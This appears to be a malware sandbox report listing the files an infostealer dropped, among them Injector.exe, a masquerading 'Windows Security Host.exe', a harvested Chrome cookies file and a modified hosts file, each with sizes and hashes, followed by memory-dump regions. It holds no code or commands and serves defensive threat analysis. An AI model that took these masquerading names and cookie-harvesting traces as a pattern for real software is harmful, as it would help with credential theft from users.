32c63d67bf512b42e7f57f71287b354200126cb417ef9d869c72e0b9388a7c2f5e3b61f303f1353baa1bf482d0f17e06e23c9f50b2f1babd4d958b6da19c40b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Injector.exe.log

Filesize
1KB

MD5
dcbdf62e96e679168e99bb26c3f28d37

SHA1
b4dd47ce9094a450cd6e03a2f1d61ea4c8b85208

SHA256
c44d43f12dedac8a011cf40417f28b4d7e0d961ac4503829f01891ce7212fa35

SHA512
679b07b35c90abdb029a202bb14c424d2497d1b8e99396d369629a066a3978e77c6257148a22c48abcbcb6370c722673d0cbb3d1fd33880fa32107d5a20869b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8e1fdd1b66d2fee9f6a052524d4ddca5

SHA1
0a9d0994559d1be2eecd8b0d6960540ca627bdb6

SHA256
4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13

SHA512
5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
43af66a28ed429a2af161d8a222cc4eb

SHA1
49f185e99c50b1f8e4dc3ae7a093dca2b0e3e523

SHA256
b3374a3cf49099885c8f32504c1a1e7644526686580762aff22ebe143d809025

SHA512
5dac23a6b9058ec07ec1a4fac12f96d722b8b9bd4ad84fdeba8f4645a47a92d749f9fe55a9a555f44272b86b7b2e0ea123531d493b291996f536ef338f83404a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
af385d68c58c51b4a4d714544b15b776

SHA1
ef89b9686597889653fe3b8b373905dfc79ada55

SHA256
b1e859f3d905ac4346d581f750b2ba6e30e07e7b41ccca87639e1109e71a19d2

SHA512
44103fdec6120b33c963f8cbd6cbee3a533d9936778aeba1d23bc2f15f4729ba12f79ee0e9157300575a4db3ef11fbfb967eec9d07c21b9dcd4885aa48b51c99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
36bb833bcefdd2f80a289fc681c87627

SHA1
4204fa10680f0a9c2699a9eb52709db1cd68e0b7

SHA256
52be5401760e6cc30c6018d277e7ce91aa262b3888297f76e95a20fdda8e2ae6

SHA512
233fbb528d3b7196fb967fff74e66dd589b6a302e97774a24fbeb971996aa6c1b17f24f19380873c976978552e245b3dd065cdb9d4133ce554c507d92f8778e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e22dd1cda88782a1f52f76e748ef957

SHA1
3231826619a06fa541e2bfb21da445bd7013b5ac

SHA256
73302eedcdcfa0f9639f0d00e50c19f7ff4b7bab9df431cfee38e4b94bd4ecec

SHA512
75039c01812a7c0bef9fc2d0b4b8867c9acf2daf6a8ade8171d8edc7c0a2ff11488554d30397fee424922346394f14eef7518943db769c35e6916bee26f16498

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
dbc5ea960326e938323c86dcc0d15ea0

SHA1
4ea5b5a3220241a4956e14aeda9058863aaac8fa

SHA256
d81e86240f3c2e264cdb5a6272205ef95d62f6089a2180da19ac0cb1a82a7809

SHA512
fb1f7b633a47ff61c983dffe66f1034d17e6fc06e3a8f762446cdb0b0242ec8f51ca806760fadd5779b1bc475b6081596dafba3606e8341d289bbbb119823b9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
494de073067224860ddfa87f20c1fcd5

SHA1
139fe0d6cc741fdbb891b5e0df6e236fcdfdd7de

SHA256
5b67e54cbb8566db2c781ed86c2e026bef8e1c6e5b454c42872ffba7782a9579

SHA512
2457bb775ad7ce2b62b35f5cddfab1c1e1b16dcba83e38e7b5fb2e205048ffc5d220a29a9b0cfe218800d46fc3888480a0822877cf392aeadcf9287b784a390a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
f899142a40c5a9ba96ec8bc9a320992b

SHA1
3830f9182ef6f361d7c7671483de62bf85e49b47

SHA256
50c1250061f3e50994f28981de9a4e07710a8e4aa3be3ff0e5c187aac6b3c45d

SHA512
abc4e9a813a8d98bc706ed0d8e6d3d785d5bae67c6bdf2eda9026a562e4074a48a11e1ef8277347629b0483e8ce329cdd707c161b9c422f8e674085288f6e939

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
e530231731b9af1e3a3165a446035ab1

SHA1
646e126e7135974aba32f617e22d907b71d49db0

SHA256
dc7ee497074ef9d967ac93ed028530fd69d7484d5c3aaba70195e86c03962aac

SHA512
95de7dc615202fcbf9172108d9cba1d800f1e98cac96702e3f1c05391123030f484233589620a303391346db50526a54bdc1e8d9b9d2924dd602edf5d88d7bd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6a09bc60ef84b1d72e61801c485795bc

SHA1
02db7c770a53f1e634163c4b6210725ffd724d02

SHA256
f5101465bd1028d56df4ac4183f88467e81916b73717b0d3bba69533e081ac69

SHA512
0f9f0316eeb4e0c0ef91f8ed97372a7d8a46bdddf24bc783eeabda05ea49de35c06751669692b5b17f30125db7b6bfbf44cbb9f3777e6ba36bcc2f0d965a3229

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3fe8acacbcea9723436f6a8a96ca56a6

SHA1
69bfb0cfb7debbc189283ce7728132bace1fb8d9

SHA256
71303800d8cc8b399bf9332dde36ba3f123adc6d9b8e30252a7225829e8777f3

SHA512
b14ff78ffd5b61c6e97fc368429f3c6678d1a72a7e8a4ceba2cf75b5b8111bebf0429f7616d88ebadc3fef43cd6ce52c6ce1a296dc4e9f3f174dcd2bc372c9ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
68b6958b941dcbcaffef2293e7c7983a

SHA1
6feb4abbf6bbcf6371d2342d13833f65baa9d30d

SHA256
bb30bd6973aaa78a5f92bfccd74aaa9c3793946aa8e6c184b2eab07eabccadeb

SHA512
60f004203e7e345a553b9d93b53623cd44f9c1bd6192288ea8744793f4164aa0ded9330f13b26721074dd74e989c890fa1af615bf8a3a749fb4101e80c79b023

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
e84201584e77775809062c523b612091

SHA1
32944b89ab29734ab688a0996b301255c71bce8c

SHA256
3178c801eb8d2e9e616f177ab5d4baa653bbb6b44f2725f9dbc3370c674be489

SHA512
b071a268d058f3e0956515c08ddc212a0c9469f02f54698b0bf44c654c75b1778d5f47c6ffcd855f8e74b7553070aba3778580d1f12fbe8d706b9ecdf3c02132

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
60b3262c3163ee3d466199160b9ed07d

SHA1
994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

SHA256
e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

SHA512
081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
b8aeebcc0c61555d509f124c05475829

SHA1
c41b49b2efa89468a01ba1710aa8f46968c6bf0b

SHA256
ac2d65f121dbbca1d93df11ea2852b5debd996c2c4f026f05438443b697a3f91

SHA512
d0b6ad23a4eedc46c63b020a24ddaa17911ddab3bc62c92ea723a9765ece7e75232e6458ef1b69848a1406d0ad8d4cef7bb8a535123f6ba0c32ac5830c31c84a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Injector.exe

Filesize
229KB

MD5
3882cfe50e35985982e9ef0c01b99c47

SHA1
6e09c71ae230b839163628c9179b3a3aac58c1a3

SHA256
da73db144e8035dd81ab4578b7f856131351ec33119c9ce0c46d852499621636

SHA512
a539767dc599b8a6103c413b4a42c83c7ce09d3171c45890f2630ad000166854c5ac220f78ab966ea90c55c1d6361ce70ea5ab3671fc2913445e8009126a534e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ROc49mOL5CSNzBM\Browsers\Cookies\Chrome Cookies.txt

Filesize
260B

MD5
d5900a8a9769b0ed1dd51874af4ac006

SHA1
41f39b70e1e9ead803b3619b7280b3221f07ecb6

SHA256
f5c20db5d14591be6a0af46a1b6cd9f4fa124183d2ebe01b4da76101f6f2eab8

SHA512
ed2def4e07a334292fdd2154e93f9d693195afe3a263630c00ec30e2e51ccddc50238030a7bfa61c02f8151e097880ef6ca44d665e92895b97ced5e0186c0f08

Download Submit
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe

Filesize
79KB

MD5
c7ba63ce2ed6d0aab93ad839e0eddd68

SHA1
087ffd969b37a73b349a81af18bb51191eb42cbd

SHA256
84be55fb4b514ebdb999b5caf4e0837c521b5e7a4f85f636e4593daf09eedae9

SHA512
9f63cfdb94af23cebc85ffd491364c1a90ab90736fc8da0fe16ebf2fb18e9a6eb8fea4dfca87d8353565ba684b0c8f461371588aac72101b355886619bf672f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1j0ume33.gxc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ieLXMCDpf3Hl4T1\Display\Display.png

Filesize
410KB

MD5
a980475ca031a21c7641c5258e36c1a3

SHA1
6514f0473fe07ecb774d40e4f4ae52cf0c06ed57

SHA256
5c0b9f7571c3351ae9fe44a059253494bbb89b5501b250d6fc0318e5b394baf6

SHA512
e96d4dc9d7d9d74dee75acdbc8e38ac5b61d12e4e5f05429aaedf7047965d91dff21dfe637c28e66d94d5a536b97cc8b2a281e0d9413e017c7b2824d790bf003

Download Submit
C:\Users\Admin\AppData\Local\Temp\znrubj.exe

Filesize
397KB

MD5
9d2618ba67f2d0f38182d44e60f00210

SHA1
6ac0946cee9e4a7ec449ba9acf834884c1f6bf18

SHA256
3e7e2d43fa4e0338a688f5be292f8f3d813aa525e2652382c11602eeeec43b76

SHA512
54c63677d64a83ddccaa72afa87c8d735b55016d80071b16c39da88bcd75de988c3ba865196cd4273ca99baa63469a58df1b778c8755a36c80968542dfcf1f09

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/1240-37-0x00007FFCFC780000-0x00007FFCFD242000-memory.dmp

Filesize
10.8MB

Download
memory/1240-0-0x00007FFCFC783000-0x00007FFCFC785000-memory.dmp

Filesize
8KB

Download
memory/1240-3-0x00007FFCFC780000-0x00007FFCFD242000-memory.dmp

Filesize
10.8MB

Download
memory/1240-1-0x0000000000660000-0x00000000006D2000-memory.dmp

Filesize
456KB

Download
memory/1792-1026-0x0000000000400000-0x000000000046A000-memory.dmp

Filesize
424KB

Download
memory/3436-46-0x0000017FCA820000-0x0000017FCA842000-memory.dmp

Filesize
136KB

Download
memory/3692-1025-0x000000001AF80000-0x000000001AF8C000-memory.dmp

Filesize
48KB

Download
memory/3780-35-0x0000000000970000-0x000000000098A000-memory.dmp

Filesize
104KB

Download
memory/3780-692-0x00007FFCFC780000-0x00007FFCFD242000-memory.dmp

Filesize
10.8MB

Download
memory/3780-168-0x00007FFCFC780000-0x00007FFCFD242000-memory.dmp

Filesize
10.8MB

Download
memory/3780-36-0x00007FFCFC780000-0x00007FFCFD242000-memory.dmp

Filesize
10.8MB

Download
memory/5080-139-0x0000025BF1730000-0x0000025BF173A000-memory.dmp

Filesize
40KB

Download
memory/5080-87-0x0000025BF2210000-0x0000025BF2286000-memory.dmp

Filesize
472KB

Download
memory/5080-88-0x0000025BF2190000-0x0000025BF21E0000-memory.dmp

Filesize
320KB

Download
memory/5080-89-0x0000025BF16E0000-0x0000025BF16FE000-memory.dmp

Filesize
120KB

Download
memory/5080-140-0x0000025BF2290000-0x0000025BF22A2000-memory.dmp

Filesize
72KB

Download
memory/5080-32-0x00007FFCFC780000-0x00007FFCFD242000-memory.dmp

Filesize
10.8MB

Download
memory/5080-165-0x00007FFCFC780000-0x00007FFCFD242000-memory.dmp

Filesize
10.8MB

Download
memory/5080-28-0x0000025BEFA70000-0x0000025BEFAB0000-memory.dmp

Filesize
256KB

Download